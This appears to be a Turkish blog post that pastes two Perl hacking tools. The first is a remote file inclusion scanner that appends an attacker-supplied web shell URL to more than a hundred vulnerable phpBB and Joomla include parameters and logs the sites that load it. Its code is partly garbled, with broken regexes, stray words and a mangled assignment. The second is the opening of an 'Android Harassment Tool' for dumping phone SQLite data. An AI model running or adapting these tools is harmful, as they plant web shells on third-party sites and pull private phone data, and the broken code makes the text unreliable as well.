#!/usr/bin/perl
############################################################
#RFI Scanner Perl PHPbb - v27.9 #
#Coded by jos_ali_joe RFI Scanner Perl #
#Indonesian Docer Team #
#Contact: josalijoe@yahoo.com #
#Explore Crew - Indonesian Coder - Devilz COde - IH - HN #
#ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael #
############################################################
use HTTP::Request;
use LWP::UserAgent;
sub lw{
my $SO = $^O;my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){system("clear");
}
else{system("cls");system ("title RFI Scanner Perl PHPbb - v27.9 ");system ("color 02");
}
}
&lw;
print "\t\t########################################################\n\n";
print "\t\t## RFI Scanner PHPbb v27.9 IDC ##\n\n";
print "\t\t## by jos_ali_joe ##\n\n";
print "\t\t## special thanks : gunslinger_ Mywisdom ##\n\n";
print "\t\t########################################################\n\n";
print "Insert host:(ex: http://www.maho.com/)\n";$host=<STDIN>;chomp $host;
print "\n";
# If the url doesn't have http: at the beginning
if ( $host !~ /^http:/ ) {
# we add it
$host = 'http://' . $host;
}
# If the url doesn't have / at the end
if ( $host !~ //$/ ) {
# we add it
$host = $host . '/';
}
print "Insert shell:(ex: http://www.maho.com/c99.txt)\n";$shell=<STDIN>;chomp $shell;
print "\n";
# If the url doesn't have http: at the beginning
if ( $shell !~ /^http:/ ) {
# we add it
$shell = 'http://' . $shell;
}
print "Insert string search:(ex: c99shell)\n";$string=<STDIN>;chomp $string;
print "\n\n";
print "Your config:\n\n";
print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";
print "Scan...\n\n";
$vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=";$vuln2="/includes/functions_portal.php?phpbb_root_path=";$vuln3="/includes/functions_mod_user.php?phpbb_root_path=";$vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=";$vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";$vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path=";$vuln7="/link_main.php?phpbb_root_path=";$vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=";$vuln9="MOD_forum_fields_parse.php?phpbb_root_path=";$vuln10="/codebb/pass_code.php?phpbb_root_path=";$vuln11="/codebb/lang_select?phpbb_root_path=";$vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path=";$vuln13="/includes/functions.php?phpbb_root_path=";$vuln14="/admin/admin_forum_prune.php?phpbb_root_path=";$vuln15="/ezconvert/config.php?ezconvert_dir=";$vuln16="/includes/class_template.php?phpbb_root_path=";$vuln17="/includes/usercp_viewprofile.php?phpbb_root_path=";$vuln18="/includes/functions.php?phpbb_root_path=";$vuln19="/menu.php?sesion_idioma=";$vuln20="/includes/functions.php?phpbb_root_path=";$vuln21="/admin/admin_linkdb.php?phpbb_root_path=";$vuln22="/admin/admin_extensions.php?phpbb_root_path=";$vuln23="/admin/admin_board.php?phpbb_root_path=";$vuln24="/admin/admin_attachments.php?phpbb_root_path=";$vuln25="/admin/admin_users.php?phpbb_root_path=";$vuln26="/includes/archive/archive_topic.php?phpbb_root_path=";$vuln28="/admin/modules_data.php?phpbb_root_path=";$vuln29="/faq.php?foing_root_path=";$vuln30="/index.php?foing_root_path=";$vuln31="/list.php?foing_root_path=";$vuln32="/login.php?foing_root_path=";$vuln33="/playlist.php?foing_root_path=";$vuln34="/song.php?foing_root_path=";$vuln35="/gen_m3u.php?foing_root_path=";$vuln36="/view_artist.php?foing_root_path=";$vuln37="/view_song.php?foing_root_path=";$vuln38="/login.php?foing_root_path=";$vuln39="/flash/set_na.php?foing_root_path=";$vuln40="/flash/initialise.php?foing_root_path=";$vuln41="/flash/get_song.php?foing_root_path=";$vuln42="/includes/common.php?foing_root_path=";$vuln43="/admin/nav.php?foing_root_path=";$vuln44="/admin/main.php?foing_root_path=";$vuln45="/admin/list_artists.php?foing_root_path=";$vuln46="/admin/index.php?foing_root_path=";$vuln47="/admin/genres.php?foing_root_path=";$vuln48="/admin/edit_artist.php?foing_root_path=";$vuln49="/admin/edit_album.php?foing_root_path=";$vuln50="/admin/config.php?foing_root_path=";$vuln51="/admin/admin_status.php?foing_root_path=";$vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path=";$vuln53="/includes/functions_mod_user.php?phpbb_root_path=";$vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path=";$vuln55="/includes/archive/archive_topic.php?phpbb_root_path=";$vuln56="/functions_rpg_events.php?phpbb_root_path=";$vuln57="/admin/admin_spam.php?phpbb_root_path=";$vuln58="/includes/functions_newshr.php?phpbb_root_path=";$vuln59="/zufallscodepart.php?phpbb_root_path=";$vuln60="/mods/iai/includes/constants.php?phpbb_root_path=";$vuln61="/root/includes/antispam.php?phpbb_root_path=";$vuln62="/phpBB2/shoutbox.php?phpbb_root_path=";$vuln63="/includes/functions_mod_user.php?phpbb_root_path=";$vuln64="/includes/functions_mod_user.php?phpbb_root_path=";$vuln65="/includes/journals_delete.php?phpbb_root_path=";$vuln66="/includes/journals_post.php?phpbb_root_path=";$vuln67="/includes/journals_edit.php?phpbb_root_path=";$vuln68="/includes/functions_num_image.php?phpbb_root_path=";$vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path=";$vuln70="/includes/themen_portal_mitte.php?phpbb_root_path=";$vuln71="/includes/logger_engine.php?phpbb_root_path=";$vuln72="/includes/logger_engine.php?phpbb_root_path=";$vuln73="/includes/functions_static_topics.php?phpbb_root_path=";$vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=";$vuln75="/includes/functions_kb.php?phpbb_root_path=";$vuln76="/includes/bbcb_mg.php?phpbb_root_path=";$vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=";$vuln78="/includes/pafiledb_constants.php?module_root_path=";$vuln79="/index.php?phpbb_root_path=";$vuln80="/song.php?phpbb_root_path=";$vuln81="/faq.php?phpbb_root_path=";$vuln82="/list.php?phpbb_root_path=";$vuln83="/gen_m3u.php?phpbb_root_path=";$vuln84="/playlist.php?phpbb_root_path=";$vuln85="/language/lang_english/lang_activity.php?phpbb_root_path=";$vuln86="/language/lang_english/lang_activity.php?phpbb_root_path=";$vuln87="/blend_data/blend_common.php?phpbb_root_path=";$vuln88="/blend_data/blend_common.php?phpbb_root_path=";$vuln89="/modules/Forums/admin/index.php?phpbb_root_path=";$vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";$vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path=";$vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path=";$vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=";$vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path=";$vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path=";$vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path=";$vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=";$vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path=";$vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path=";$vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";$vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=";$vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path=";$vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=";$vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path=";$vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path=";
$vuln107="/stat_modules/users_age/module.php?phpbb_root_path=";
$vuln108="/includes/functions_cms.php?phpbb_root_path=";
$vuln109="/m2f/m2f_phpbb204.php?m2f_root_path=";
$vuln110="/m2f/m2f_forum.php?m2f_root_path=";
$vuln111="/m2f/m2f_mailinglist.php?m2f_root_path=";
$vuln112="/m2f/m2f_cron.php?m2f_root_path=";
$vuln113="/lib/phpbb.php?subdir=";
$vuln114="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln115="/includes/functions.php?phpbb_root_path=";
$vuln116="/includes/functions_portal.php?phpbb_root_path=";
$vuln117="/includes/functions.php?phpbb_root_path=";
$vuln118="/includes/functions_admin.php?phpbb_root_path=";
$vuln119="/toplist.php?f=toplist_top10&phpbb_root_path=";
$vuln120="/admin/addentry.php?phpbb_root_path=";
$vuln121="/includes/kb_constants.php?module_root_path=";
$vuln122="/auth/auth.php?phpbb_root_path=";
$vuln123="/auth/auth_phpbb/phpbb_root_path=";
$vuln124="/auction/auction_common.php?phpbb_root_path=";
$vuln125="/auth/auth_SMF/smf_root_path=";
$vuln126="/auth/auth.php?smf_root_path=";
for ($i=1;$i<59;$i++)
{
$cont=vuln.$i;
chomp $cont;
print "$contn";
$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final alias selesai);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$finaln";
close(FILE);
print "-------------------------------------------------n";
print "$finaln";
print "IS VULNZ..n";
print "-------------------------------------------------n";
}}
} PHP- Kodu:
#!/usr/bin/perl
###############################################
# Version 0.1 Andr01d Magic dumper
#
# Written by Sw1tCh
#
###############################################
# Process goes: Untar -> Search -> Dislay
#
#
##############
# You will need the following to work with
# SQLite3
#
# $ perl -MCPAN -e shell
# cpan> install DBI
# cpan> install DBD::SQLite
##############################################use strict;#use warnings;use Archive::Tar;
use Term::Menu;
use DBI;
print "#############################################################\n";
print "## Android Harassment Tool \n";
print "## Version 0.1 \n";
print "## Written by Sw1tCh \n";
print "#############################################################\n"; Bir Kac Örnek Vermek İstedim..
Hiç yorum yok:
Yorum Gönder